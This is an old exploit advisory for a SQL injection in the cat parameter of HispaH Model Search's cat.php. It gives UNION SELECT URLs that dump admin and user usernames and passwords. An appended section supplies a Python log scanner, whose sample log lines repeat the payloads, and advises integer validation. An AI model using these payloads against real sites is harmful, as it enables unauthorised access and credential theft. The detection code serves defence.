HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability

2008-05-09 00:00:00

############### >>> Remote SQL Injection <<< ###############
## Cyb3r-1st Cyb3r-1st ##
################## >>> InjEctOr5 TeaM <<< ################

## author : cyb3r-1st
## contact : t3tto0 [at] yahoo.com
##           cyb3r-1st [at] hotmail.com

## script : model-search
## download : www.hispah.com/demos/models1rock ::> demo

## dork : find it
## exploit : http://www.site.me/cat.php?cat=[sql injection]

## example: here you can find an SQL exploit :::
## for admin inf0 :::
www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
## for users inf0 :::
www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*


########### Greetz #############

>>> InjEctOr5 TeaM
>>> my best friends :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy -x and all friends
>>> all muslims


Fixes

No fixes
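
With no fix listed, requests like the ones in the advisory can at least be spotted in web-server access logs. The following is an added example, not part of the original advisory or of HispaH's code: it flags any request to cat.php whose decoded cat value is not a plain integer. The Combined Log Format, the integer-only rule for cat, and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a short decimal integer.
VALID_CAT = re.compile(r"\d{1,10}")
SCRIPT = "/cat.php"


def suspicious_cat_values(line):
    """Return the decoded `cat` values in one log line that are not plain integers."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(SCRIPT):
        return []
    # parse_qs percent-decodes and maps '+' to a space, so %27 is caught like a raw quote.
    values = parse_qs(target.query, keep_blank_values=True).get("cat", [])
    return [v for v in values if not VALID_CAT.fullmatch(v)]


def scan(lines):
    """Return (client_ip, bad_value) for every non-integer `cat` value seen."""
    hits = []
    for line in lines:
        ip = line.split(" ", 1)[0]
        for value in suspicious_cat_values(line):
            hits.append((ip, value))
    return hits


# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/May/2008:10:00:01 +0000] "GET /cat.php?cat=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/May/2008:10:00:05 +0000] "GET /cat.php?cat=9999999\'+union+select+concat(username,0x3a,password)+from+admin/* HTTP/1.1" 200 733',
    '203.0.113.9 - - [09/May/2008:10:00:09 +0000] "GET /cat.php?cat=9999999%27%20union%20select%201 HTTP/1.1" 200 701',
    '198.51.100.7 - - [09/May/2008:10:00:12 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tcat={value!r}")
```

The same integer-only check, applied in cat.php before the value reaches the query, rejects these requests at the source.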
